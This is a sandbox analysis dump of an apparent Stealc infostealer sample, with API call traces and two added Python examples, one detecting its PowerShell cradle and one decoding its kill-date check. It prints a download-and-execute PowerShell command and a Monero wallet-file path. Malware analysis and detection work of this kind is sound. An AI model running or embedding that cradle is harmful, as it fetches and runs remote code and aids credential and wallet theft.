                  • Instruction Fuzzy Hash: 13F05E30908209EFDB449FE0E90973C7B70FB04703F044198E60AA72D0DAB85F419F96
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00924FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00924FD1
                  • InternetOpenA.WININET(00940DDF,00000000,00000000,00000000,00000000), ref: 00924FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00925011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00925041
                  • InternetCloseHandle.WININET(?), ref: 009250B9
                  • InternetCloseHandle.WININET(?), ref: 009250C6
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: 812bbeb03f9cd527e3312c4ad14048cd60c6c5f19410beb2601ccdf5360d65dd
                  • Instruction ID: c9191ce28dcde15e7f99c27c464ecfd647659feaa98351cd91e11e7466f54bd5
                  • Opcode Fuzzy Hash: 812bbeb03f9cd527e3312c4ad14048cd60c6c5f19410beb2601ccdf5360d65dd
                  • Instruction Fuzzy Hash: E531E6B4A40218ABDB20CF54DC85BDDB7B4EB48704F1081D9EA09B7281DAB46E858F99
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00938426
                  • wsprintfA.USER32 ref: 00938459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0093847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 0093848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00938499
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                  • RegQueryValueExA.ADVAPI32(00000000,0105DE78,00000000,000F003F,?,00000400), ref: 009384EC
                  • lstrlen.KERNEL32(?), ref: 00938501
                  • RegQueryValueExA.ADVAPI32(00000000,0105DE48,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00940B34), ref: 00938599
                  • RegCloseKey.ADVAPI32(00000000), ref: 00938608
                  • RegCloseKey.ADVAPI32(00000000), ref: 0093861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: 8c2456391c06deef7af23be6feb5dac934a1a648d3b9ea69f235db027ca72a7c
                  • Instruction ID: f865eb39999f6c38296836612bd85990cee589931772a83f0dbd64339a230731
                  • Opcode Fuzzy Hash: 8c2456391c06deef7af23be6feb5dac934a1a648d3b9ea69f235db027ca72a7c
                  • Instruction Fuzzy Hash: 8F21E7B1910218ABDB24DB54DC85FE9B3B8FB88704F00C598E609A7180DF75AA85CFD4
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009376A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009376AB
                  • RegOpenKeyExA.ADVAPI32(80000002,0104BA08,00000000,00020119,00000000), ref: 009376DD
                  • RegQueryValueExA.ADVAPI32(00000000,0105DE18,00000000,00000000,?,000000FF), ref: 009376FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 00937708
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: a28798df56fb0e181b22e434e2851ba0d6facce5a666bddb815e7b86a8afc337
                  • Instruction ID: 4ac8724752521ee154a17441054bf3ae71770d25fc98ad3cf40f1e62994c0ebb
                  • Opcode Fuzzy Hash: a28798df56fb0e181b22e434e2851ba0d6facce5a666bddb815e7b86a8afc337
                  • Instruction Fuzzy Hash: 75014FB5A04208BBDB10DBE4DD49F69B7BCEB48701F104454FA05A72D1EAB899008F52
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0093773B
                  • RegOpenKeyExA.ADVAPI32(80000002,0104BA08,00000000,00020119,009376B9), ref: 0093775B
                  • RegQueryValueExA.ADVAPI32(009376B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0093777A
                  • RegCloseKey.ADVAPI32(009376B9), ref: 00937784
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: fa865f44ef6c1a63bb833693f231fa893c01eb02212dc8eb263e5c80dfbd34cb
                  • Instruction ID: 77aede2e0d0afaa246edac354af8a44b64e26a35e1c63519bc7623da698c1a89
                  • Opcode Fuzzy Hash: fa865f44ef6c1a63bb833693f231fa893c01eb02212dc8eb263e5c80dfbd34cb
                  • Instruction Fuzzy Hash: 0F01F4B5A40308BBDB10DBE4DC4AFAEB7B8EB44705F104555FA05A72C1DAB469008F51
                  APIs
                  • memset.MSVCRT ref: 009340D5
                  • RegOpenKeyExA.ADVAPI32(80000001,0105D9D8,00000000,00020119,?), ref: 009340F4
                  • RegQueryValueExA.ADVAPI32(?,0105EB00,00000000,00000000,00000000,000000FF), ref: 00934118
                  • RegCloseKey.ADVAPI32(?), ref: 00934122
                  • lstrcat.KERNEL32(?,00000000), ref: 00934147
                  • lstrcat.KERNEL32(?,0105EB90), ref: 0093415B
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValuememset
                  • String ID:
                  • API String ID: 2623679115-0
                  • Opcode ID: 27d7b4c301b048db4504cc3532d401fdb754cb8c6dc83aad6b3414b1ea7f6e2a
                  • Instruction ID: c36713559e266aa81ceec45b1eee345cd2c64a03f3272ecc32e079c30a51b1c6
                  • Opcode Fuzzy Hash: 27d7b4c301b048db4504cc3532d401fdb754cb8c6dc83aad6b3414b1ea7f6e2a
                  • Instruction Fuzzy Hash: 5F4148B69101086BDF24EBA0EC56FFE737DAB98300F404558B616571C1EEB95B888FD2
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
                  • LocalFree.KERNEL32(0092148F), ref: 00929A90
                  • CloseHandle.KERNEL32(000000FF), ref: 00929A9A
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: 61ed2886a69b73b9bb1f51209b05967e6b4d3b22df94b354345ac1678d22344f
                  • Instruction ID: f75927dd7689228d5e24d63e667902449e0cae48c116a4f9b3256e3c556283a0
                  • Opcode Fuzzy Hash: 61ed2886a69b73b9bb1f51209b05967e6b4d3b22df94b354345ac1678d22344f
                  • Instruction Fuzzy Hash: AC3106B4A00309EFDF14CFA4D995BAE77B9FF48340F108158E911A7294DB78AA41CFA1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Typememset
                  • String ID:
                  • API String ID: 3530896902-3916222277
                  • Opcode ID: 420c054d05d0980a9238c57ed84f84f3f27f867d4403ef2c3b5d1b763bf214a3
                  • Instruction ID: 0db552c060926a714a2873f2c6508a8cc9e9816bbc1fed04609c228229efab5d
                  • Opcode Fuzzy Hash: 420c054d05d0980a9238c57ed84f84f3f27f867d4403ef2c3b5d1b763bf214a3
                  • Instruction Fuzzy Hash: D941F5B1100B9C5EDB218B24CC95FFBBBED9F45704F1448E8E9CAA6182D2719A449F20
                  APIs
                  • lstrcat.KERNEL32(?,0105E360), ref: 009347DB
                    • Part of subcall function 00938DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00934801
                  • lstrcat.KERNEL32(?,?), ref: 00934820
                  • lstrcat.KERNEL32(?,?), ref: 00934834
                  • lstrcat.KERNEL32(?,0104AEA0), ref: 00934847
                  • lstrcat.KERNEL32(?,?), ref: 0093485B
                  • lstrcat.KERNEL32(?,0105D978), ref: 0093486F
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 00938D90: GetFileAttributesA.KERNEL32(00000000,?,00921B54,?,?,0094564C,?,?,00940E1F), ref: 00938D9F
                    • Part of subcall function 00934570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00934580
                    • Part of subcall function 00934570: RtlAllocateHeap.NTDLL(00000000), ref: 00934587
                    • Part of subcall function 00934570: wsprintfA.USER32 ref: 009345A6
                    • Part of subcall function 00934570: FindFirstFileA.KERNEL32(?,?), ref: 009345BD
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: c11e36e89733e456985402a478de5f173ee9cb37d9366223bd57218b2cc812c9
                  • Instruction ID: 7a2c378e54c70493f71b58f6a6fbd6e30555a5ac48381ed7b1f0aaadfaa9aa85
                  • Opcode Fuzzy Hash: c11e36e89733e456985402a478de5f173ee9cb37d9366223bd57218b2cc812c9
                  • Instruction Fuzzy Hash: 663132B290031867CB14F7A0DC85FEE737DAB98700F404989B355A7191EEB4E6898F95
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00932D85
                  Strings
                  • ')", xrefs: 00932CB3
                  • <, xrefs: 00932D39
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00932CC4
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00932D04
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 0367fa8896eb5e8190f52c8cb9f7e701b04785f45337c775b383d592ceb9b1bc
                  • Instruction ID: d04e16952a0a322c208634e46fd9d24155deecdb23a0aca1d2fdb8ff0f6017b4
                  • Opcode Fuzzy Hash: 0367fa8896eb5e8190f52c8cb9f7e701b04785f45337c775b383d592ceb9b1bc
                  • Instruction Fuzzy Hash: 7A41AF71D10208AADB14FFA0C892FEEB778AF94300F504119F156B7192EF746A4ACF96
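The function above assembles the command line the report's "Yara detected Powershell download and execute" signature refers to: the 32-bit PowerShell host under SysWOW64 is launched through ShellExecuteEx (the 0x3C argument is the cbSize of a 32-bit SHELLEXECUTEINFOA, 60 bytes) with `-nop -c "iex(New-Object Net.WebClient).DownloadString('...')"`; the URL itself is not shown in the report. The detection logic below is an added example written for this entry and is not part of the Joe Sandbox report or of the sample; the process-creation events it runs over are constructed in Sysmon Event ID 1 style, and the URL in the first event is a placeholder. It flags the cradle when an expression-evaluation primitive and a download method co-occur in one command line, case-insensitively and independent of switch spelling, and records the SysWOW64 host as a context hint rather than a hit on its own.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 fields). The first
# mirrors the command line assembled by this function; example.invalid is a
# placeholder, the report does not disclose the real download URL.
SAMPLE_EVENTS = [
    {
        "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
        "ParentImage": "C:\\Users\\user\\Desktop\\file.exe",
        "CommandLine": "\"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -c "
                       "\"iex(New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')\"",
    },
    {   # benign interactive use, should not fire
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CommandLine": "powershell.exe -NoProfile -Command \"Get-Process | Sort-Object CPU\"",
    },
    {   # same cradle with long-form switches and mixed case
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "ParentImage": "C:\\Windows\\System32\\cmd.exe",
        "CommandLine": "PoWeRsHeLl.exe -NoProfile -Command \"Invoke-Expression "
                       "(New-Object System.Net.WebClient).DownloadString('http://example.invalid/x')\"",
    },
]

# Each indicator is matched on the whitespace-normalised command line.
INDICATORS = [
    ("invoke-expression", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("webclient",         re.compile(r"new-object\s+(system\.)?net\.webclient", re.I)),
    ("download-method",   re.compile(r"\.download(string|file|data)\s*\(", re.I)),
    ("noprofile",         re.compile(r"(^|\s)-nop(rofile)?\b", re.I)),
]


def classify(event):
    """Score one process-creation event for the download-and-execute cradle."""
    cmd = " ".join(event.get("CommandLine", "").split())
    hits = [name for name, rx in INDICATORS if rx.search(cmd)]
    # A 32-bit parent calling ShellExecuteEx on the System32 PowerShell path is
    # redirected to SysWOW64 on 64-bit Windows; this is a bitness hint about the
    # parent (consistent with this sample), not a detection by itself.
    if "\\syswow64\\" in event.get("Image", "").lower():
        hits.append("wow64-host")
    cradle = "invoke-expression" in hits and "download-method" in hits
    return {"cradle": cradle, "indicators": hits, "parent": event.get("ParentImage", "")}


def hunt(events):
    """Return (command line, classification) for every event that carries the cradle."""
    flagged = []
    for event in events:
        verdict = classify(event)
        if verdict["cradle"]:
            flagged.append((event.get("CommandLine", ""), verdict))
    return flagged


if __name__ == "__main__":
    for cmd, verdict in hunt(SAMPLE_EVENTS):
        print(verdict["parent"], "->", verdict["indicators"])
        print("   ", cmd)
```

The pairing of an expression evaluator with a download method is what makes the rule robust to the switch abbreviations and case changes seen across Stealc builds; keying on `-nop` alone would miss the long form and fire on ordinary administration.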
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00929F41
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 045348c1716ff297388cca2bcc30f15712958da239f24a6392de6dd4592fd9f9
                  • Instruction ID: 770f55b829f200856fa7ebf66c54a4ec5bb5d824f870b36bf333142943ca1f7d
                  • Opcode Fuzzy Hash: 045348c1716ff297388cca2bcc30f15712958da239f24a6392de6dd4592fd9f9
                  • Instruction Fuzzy Hash: A6615E71A00218AFDB24EFA4DC96FEE7779AF85304F008018F90A5F195EB746A05CF92
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 0093696C
                  • sscanf.NTDLL ref: 00936999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009369B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009369C0
                  • ExitProcess.KERNEL32 ref: 009369DA
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: 3a21276cd7f90df18236a5176aee02e197440fdc15b09b1dbb737c91b9fd0673
                  • Instruction ID: bfd24cd9047eed487d0f02e076a199b33010f1da8c8f20c005a397bbf214f056
                  • Opcode Fuzzy Hash: 3a21276cd7f90df18236a5176aee02e197440fdc15b09b1dbb737c91b9fd0673
                  • Instruction Fuzzy Hash: 9F21C9B5D14209ABCF04EFE4D955AEEB7B9BF48300F04852AE506F3250EB745605CFA9
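The chain GetSystemTime, sscanf, two SystemTimeToFileTime calls and ExitProcess at 0093696C..009369DA has the shape of an expiry (kill-date) check: a date string is parsed into a SYSTEMTIME, both it and the current UTC time are converted to FILETIME so they can be compared as 64-bit integers, and the process exits when the deadline has passed. This matters for analysis because a sandbox whose clock is past the embedded date sees the sample terminate quietly and looks benign. The Python below is an added example written for this entry, not code from the report or the sample: it reproduces the FILETIME arithmetic so an analyst can compute which clock keeps the sample alive and can decode a FILETIME read from a memory dump. The report does not show the sscanf format string, so the `YYYY-MM-DD` format used by `parse_expiry` is an assumption to be replaced with the real one.

```python
from datetime import datetime, timedelta, timezone

# FILETIME counts 100-nanosecond intervals since 1601-01-01 00:00:00 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def to_filetime(dt):
    """Mirror SystemTimeToFileTime for an aware datetime (GetSystemTime yields UTC)."""
    delta = dt.astimezone(timezone.utc) - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def from_filetime(ft):
    """Inverse conversion, for a FILETIME value pulled out of a dump."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def filetime_from_bytes(raw):
    """Decode the little-endian 8-byte FILETIME layout as stored in memory."""
    return int.from_bytes(raw[:8], "little")


def parse_expiry(text, fmt="%Y-%m-%d"):
    """Stand-in for the sample's sscanf call; the format string is an assumption
    because the report does not show it."""
    return datetime.strptime(text, fmt).replace(tzinfo=timezone.utc)


def expired(expiry_text, now=None):
    """True on the branch that reaches ExitProcess: current FILETIME is past the deadline."""
    current = now if now is not None else datetime.now(timezone.utc)
    return to_filetime(current) > to_filetime(parse_expiry(expiry_text))


if __name__ == "__main__":
    # Constructed deadline for illustration; with a sandbox clock of 2024-06-01
    # the sample would exit, with the clock rolled back it would keep running.
    clock = datetime(2024, 6, 1, tzinfo=timezone.utc)
    print("expired:", expired("2024-01-01", now=clock))
    print("FILETIME of 1970-01-01:", to_filetime(datetime(1970, 1, 1, tzinfo=timezone.utc)))
```

Because the comparison is on FILETIME rather than on the broken-down SYSTEMTIME fields, only the UTC clock matters; the machine's time zone and locale do not influence the branch.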
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00937E3E
